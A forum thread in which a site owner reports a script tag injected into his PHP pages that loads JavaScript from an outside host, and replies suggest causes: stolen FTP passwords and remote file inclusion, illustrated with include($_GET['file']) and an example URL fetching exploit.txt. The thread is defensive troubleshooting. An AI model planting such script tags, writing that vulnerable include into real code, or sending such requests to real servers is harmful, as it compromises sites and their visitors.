Sites being hacked!

[ayok]

Hi,

Recently I've found some of my websites has infected by something.. I really don't know how to call it.

 

Some where in the source (usually, index.php or home.php) has this suspicious line. I don't know what's that, but it seems harmful. The script are mostly like below:

 

<!-- ad --><script language=javascript src="http://counter.ironsteelmoney.com/show.js"></script><!-- /ad -->

 

My questions are, what should i call this? Am I being cracked/hacked? How could it be happened? I've deleted it, but I'm not sure whether this won't back. Could please anyone help me?

 

Thank you,

 

ayok

[Mchl]

POssibly your FTP password got compromised. I hear there are worms that use the passswords stored in Total Commander to upload their code online.

[ayok]

So they know the ftp password of those sites? Does it simply delete the line and change the password to get rid of it?

How can I avoid this to get back?

 

Thanks

 

ayok

[Mchl]

Change your password. Do not store your passwords in ftp clients. Scan your PC for malware.

[premiso]

Aside from a password being found out. It could be a script that dynamically includes a file an example:

 

include($_GET['file']);

 

If url_fopen_wrappers are turned on then that allows for someone to inject their own code from a remote website by passing something like this:

index.php?file=http://www.mysite.com/exploit.txt

 

And viola, their code gets executed. Which would allow them to create a file to write to other files etc. The gist of it is, you need to look at your code and see if there may be a vulnerability to allow someone to access. To find the offending file you can look at the apache access logs as it will show you each GET Request that was sent and if you see something like the above url being sent via get, someone is probing and or found the vulnerability and it usually can lead to you finding the offending file.

 

The only reason I know this is one of my hosted users had an old version of OS Commerce that and an exploit in it, and this allowed for someone to create a script that used my mail server to send out spam. Luckily they only screwed with OS Commerce so it was as simple as backing up the products and installing the newer version to fix it and deleting the file.

[Daniel0]

We did this to protect against what premiso just explained.

[premiso]

We did this to protect against what premiso just explained.

 

Nice I must have never noticed that before. That will be good to use when installing 3rd party scripts, that I do not know if they filter out includes or not

[Daniel0]

Yeah that's what we're using it for as well. We don't have that much control over SMF, so it's nice to just block all requests like that.

[The Little Guy]

Are you using cPanel? One of my old web hosts was using that, and it got hacked, and who ever got in changed EVERYONE'S  index and/or home files on the servers to something that was like hatred towards the U.S. It even got into the hosts back up files. They then took the back up files offline in case that were to happen again.

 

It is also possible:

- hacked username/password

- Anonymous FTP is on

- You have a coding error

 

and according to Firefox:

Reported Attack Site!